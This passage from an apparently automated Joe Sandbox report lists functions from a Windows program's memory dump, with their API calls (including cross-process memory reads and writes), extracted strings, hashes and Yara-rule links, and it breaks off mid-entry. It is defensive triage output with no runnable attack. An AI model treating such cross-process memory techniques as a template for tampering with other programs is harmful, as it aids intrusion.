                                                                                                          • Instruction ID: 7fb17778cf8453e2a58fdd6cb48c5c8648df6f25fb0b29eeee665bb58b4df177
                                                                                                          • Opcode Fuzzy Hash: 45c267c0f1260d722e649083204359922d92376ee50a6f93891ffc114116a3f4
                                                                                                          • Instruction Fuzzy Hash: 7BF0AF30202204BFEF110FA6AC88F6B3BACEF8A758F544426F904E21A0CA60DC04DB60
                                                                                                          Function 00E98D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E98D3F
                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D49
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D58
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D5F
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E98D75
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 44706859-0
                                                                                                          • Opcode ID: e1dc4fc4bda52f7f2e946c3613ccf64c5fd2debe693141f50c864abe034861bd
                                                                                                          • Instruction ID: cbcc6175aefd4e897b529815162aac0fb1b0369bc9f492afc4812b668047306a
                                                                                                          • Opcode Fuzzy Hash: e1dc4fc4bda52f7f2e946c3613ccf64c5fd2debe693141f50c864abe034861bd
                                                                                                          • Instruction Fuzzy Hash: 2CF04431242204BFDB110F65EC88FA73B6DEF86758F580516F545E71A0CB619D45DB60
                                                                                                          Function 00E9CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00E9CD90
                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E9CDA7
                                                                                                          • MessageBeep.USER32(00000000), ref: 00E9CDBF
                                                                                                          • KillTimer.USER32(?,0000040A), ref: 00E9CDDB
                                                                                                          • EndDialog.USER32(?,00000001), ref: 00E9CDF5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3741023627-0
                                                                                                          • Opcode ID: 4ea14b45c5a7a28a41e49b02385aac3eeaa79ac85ce82ad0c22dea6e4b269142
                                                                                                          • Instruction ID: 5afb755d25a00979abeef7b6e70bcfd1c28ddc91078fa4cd034a0e1409a3a46a
                                                                                                          • Opcode Fuzzy Hash: 4ea14b45c5a7a28a41e49b02385aac3eeaa79ac85ce82ad0c22dea6e4b269142
                                                                                                          • Instruction Fuzzy Hash: 0501D630540704AFEF206F21EC4EBA67BB8FB00705F04066AF592B14E1DBF0A9988B81
                                                                                                          Function 00E4178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EndPath.GDI32(?), ref: 00E4179B
                                                                                                          • StrokeAndFillPath.GDI32(?,?,00E7BBC9,00000000,?), ref: 00E417B7
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00E417CA
                                                                                                          • DeleteObject.GDI32 ref: 00E417DD
                                                                                                          • StrokePath.GDI32(?), ref: 00E417F8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                          • String ID:
                                                                                                          • API String ID: 2625713937-0
                                                                                                          • Opcode ID: bf4d58aaed48deebf79d95d151e7f59d8b4ce667e76a39b67dff12bfb8b28b96
                                                                                                          • Instruction ID: 6e58355859c74b7171d3a033d971b7f4b3751a55706bcdbda9ed1a3cc0a7c21c
                                                                                                          • Opcode Fuzzy Hash: bf4d58aaed48deebf79d95d151e7f59d8b4ce667e76a39b67dff12bfb8b28b96
                                                                                                          • Instruction Fuzzy Hash: 0DF0B630409348BFDB516F26FC4C75A3BA4F70136AF28D296E469651B0C731A999EF24
                                                                                                          Function 00EAC9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CoInitialize.OLE32(00000000), ref: 00EACA75
                                                                                                          • CoCreateInstance.OLE32(00ED3D3C,00000000,00000001,00ED3BAC,?), ref: 00EACA8D
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                          • CoUninitialize.OLE32 ref: 00EACCFA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 2683427295-24824748
                                                                                                          • Opcode ID: 8d605e75dd943ae0268be3e2bf7dc806c77766593b766662e1e6885338f44ba2
                                                                                                          • Instruction ID: aeca326378d38ee04359c9306905cb4b616ad84f7119595745b668169e482518
                                                                                                          • Opcode Fuzzy Hash: 8d605e75dd943ae0268be3e2bf7dc806c77766593b766662e1e6885338f44ba2
                                                                                                          • Instruction Fuzzy Hash: 4EA15DB1204205AFD304EF64DC81EAFB7E8EF94714F00595DF595A7292EB70EA09CB92
                                                                                                          Function 00E4E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E60FE6: std::exception::exception.LIBCMT ref: 00E6101C
                                                                                                            • Part of subcall function 00E60FE6: __CxxThrowException@8.LIBCMT ref: 00E61031
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00E51680: _memmove.LIBCMT ref: 00E516DB
                                                                                                          • __swprintf.LIBCMT ref: 00E4E598
                                                                                                          Strings
                                                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E4E431
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                          • API String ID: 1943609520-557222456
                                                                                                          • Opcode ID: c7d15ec8410c50f9dd828b2ecaef4178596cfba2ba60390dc4ed204578bcb6d2
                                                                                                          • Instruction ID: cd6ecc45e163064cfe39b7dc159c47279ad5252fde1b0610d9ee62f9b145d470
                                                                                                          • Opcode Fuzzy Hash: c7d15ec8410c50f9dd828b2ecaef4178596cfba2ba60390dc4ed204578bcb6d2
                                                                                                          • Instruction Fuzzy Hash: 7D917D725082019FC714FF24D895D6EB7E4EF95304F40695DF89AB72A1EA20EE48CB92
                                                                                                          Function 00E6523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00E652CD
                                                                                                            • Part of subcall function 00E70320: __87except.LIBCMT ref: 00E7035B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorHandling__87except__start
                                                                                                          • String ID: pow
                                                                                                          • API String ID: 2905807303-2276729525
                                                                                                          • Opcode ID: d51eca799a919952ee0eda1d148c7542cd181d040cc4ff70d42c17205c0a02e4
                                                                                                          • Instruction ID: e816c2982c68dcb9663136ab144e92b2c5169abfc096e585791732dc5b6c806a
                                                                                                          • Opcode Fuzzy Hash: d51eca799a919952ee0eda1d148c7542cd181d040cc4ff70d42c17205c0a02e4
                                                                                                          • Instruction Fuzzy Hash: BB51BF22B49601D7CB11A714E91137A77E0DB00B98F30F859E0E9B52F9FE348CC49A46
                                                                                                          Function 00E60654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #$+
                                                                                                          • API String ID: 0-2552117581
                                                                                                          • Opcode ID: 50198a918fcd42f4f7580ca25e6d15b3158b28717c9ced3bb1ebb94fa1c58e5a
                                                                                                          • Instruction ID: 29d3d79043e745edb63cb4906ce19ac50fc8d4f870b9467f953ec947e908c20a
                                                                                                          • Opcode Fuzzy Hash: 50198a918fcd42f4f7580ca25e6d15b3158b28717c9ced3bb1ebb94fa1c58e5a
                                                                                                          • Instruction Fuzzy Hash: 85510175500255CFDF29EF68D880AFA7BA4EF56328F142057EC91BB290D734AD86CB60
                                                                                                          Function 00E4E7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_free
                                                                                                          • String ID: #V
                                                                                                          • API String ID: 2620147621-3658881132
                                                                                                          • Opcode ID: 8bce29921d4ecfbd28c6fe1a685190d529c8b33ae6e5897f96e4c89816f4ca7f
                                                                                                          • Instruction ID: 7300678581917208164763c595dcaec391dcc8b29467e95ee06f983d30f026bc
                                                                                                          • Opcode Fuzzy Hash: 8bce29921d4ecfbd28c6fe1a685190d529c8b33ae6e5897f96e4c89816f4ca7f
                                                                                                          • Instruction Fuzzy Hash: D65159716087418FDB24CF28D491B2BBBE1FF85358F05592DE999A7351EB31E801CB92
                                                                                                          Function 00E5CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset$_memmove
                                                                                                          • String ID: ERCP
                                                                                                          • API String ID: 2532777613-1384759551
                                                                                                          • Opcode ID: a24c214f370010cb0b480bab7ec856f63162d0d333507f65a09997cff5bf6d93
                                                                                                          • Instruction ID: bb4a0da0116710f7c83a470857b3b0bebe8f2595b86ad5b08c14c3e06065e7fb
                                                                                                          • Opcode Fuzzy Hash: a24c214f370010cb0b480bab7ec856f63162d0d333507f65a09997cff5bf6d93
                                                                                                          • Instruction Fuzzy Hash: 0E51C3719047099FDB34CF64C8817AABBF5EF44315F24996EE94AEB281E730D589CB40
                                                                                                          Function 00E9A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EA1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E99E4E,?,?,00000034,00000800,?,00000034), ref: 00EA1CE5
                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E9A3F7
                                                                                                            • Part of subcall function 00EA1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E99E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00EA1CB0
                                                                                                            • Part of subcall function 00EA1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00EA1C08
                                                                                                            • Part of subcall function 00EA1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E99E12,00000034,?,?,00001004,00000000,00000000), ref: 00EA1C18
                                                                                                            • Part of subcall function 00EA1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E99E12,00000034,?,?,00001004,00000000,00000000), ref: 00EA1C2E
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E9A464
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E9A4B1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                          • String ID: @
                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                          • Opcode ID: de6685bec8949767831a3b88742cf636969784a56eea9f0df7a111af11a7fd20
                                                                                                          • Instruction ID: 0dd0482d74ad17d6b670ff1acc4d2567c747d904c6d227383606f2f9933381d3
                                                                                                          • Opcode Fuzzy Hash: de6685bec8949767831a3b88742cf636969784a56eea9f0df7a111af11a7fd20
                                                                                                          • Instruction Fuzzy Hash: 88414C7290121CAFCF10DBA4CD85ADEB7B8EF49310F1440A5FA55BB181DA706E45CBA1
                                                                                                          Function 00EC79FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EC7A86
                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EC7A9A
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EC7ABE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window
                                                                                                          • String ID: SysMonthCal32
                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                          • Opcode ID: d95e85f020ab1e0955f332d7df2d37ab1425f01f739ef190dc5d21a371009c2e
                                                                                                          • Instruction ID: 6f7233df0e6e5e7f9864d151dd15abccbca2a23429be3a080aeba830895f7298
                                                                                                          • Opcode Fuzzy Hash: d95e85f020ab1e0955f332d7df2d37ab1425f01f739ef190dc5d21a371009c2e
                                                                                                          • Instruction Fuzzy Hash: B321A132604218BFDF118F64DC42FEE3BA9EF48724F111218FE557B1D0DAB2A8559BA0
                                                                                                          Function 00EC81B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EC826F
                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EC827D
                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EC8284
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                          • String ID: msctls_updown32
                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                          • Opcode ID: ae2f31209e5d019ae8eb370f278f4865a15af6a5947a2557c023d3f5f9f218ce
                                                                                                          • Instruction ID: 537cc05966f7e688536e69ce05521e7c43f6945cd559c81542595dac9b8f6271
                                                                                                          • Opcode Fuzzy Hash: ae2f31209e5d019ae8eb370f278f4865a15af6a5947a2557c023d3f5f9f218ce
                                                                                                          • Instruction Fuzzy Hash: 232195B1A04208AFDB00DF54DE85E6737EDEB49354B18505DFA01A7261CB71EC12DBA0
                                                                                                          Function 00EC72D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EC7360
                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EC7370
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EC7395
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                          • String ID: Listbox
                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                          • Opcode ID: 9d0db920283c2e7b5130114158a65c25bcb6c68635bfea3f02fb62148e2beb0c
                                                                                                          • Instruction ID: cfcb46c630090d0d2b1b81be1c870fcd9ef480705005b204b085d786cc3799e8
                                                                                                          • Opcode Fuzzy Hash: 9d0db920283c2e7b5130114158a65c25bcb6c68635bfea3f02fb62148e2beb0c
                                                                                                          • Instruction Fuzzy Hash: D221C532604218BFDF118F58DC45FBF37AAEB89754F119129FD50AB190C672AC529BA0
                                                                                                          Function 00E7B4F1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E7B544: _memset.LIBCMT ref: 00E7B551
                                                                                                            • Part of subcall function 00E60B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E7B520,?,?,?,00E4100A), ref: 00E60B79
                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,00E4100A), ref: 00E7B524
                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E4100A), ref: 00E7B533
                                                                                                          Strings
                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E7B52E
                                                                                                          • =, xrefs: 00E7B514
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=
                                                                                                          • API String ID: 3158253471-1801005180
                                                                                                          • Opcode ID: 504fe457eab240a6ea482b5f6faa308ec7e8b7b1342dd7a15c3c171c8bb0f15d
                                                                                                          • Instruction ID: e693137711fc22c7ee4fc6c4076c0780d0c21b7158c1323b0f8526aad4369b21
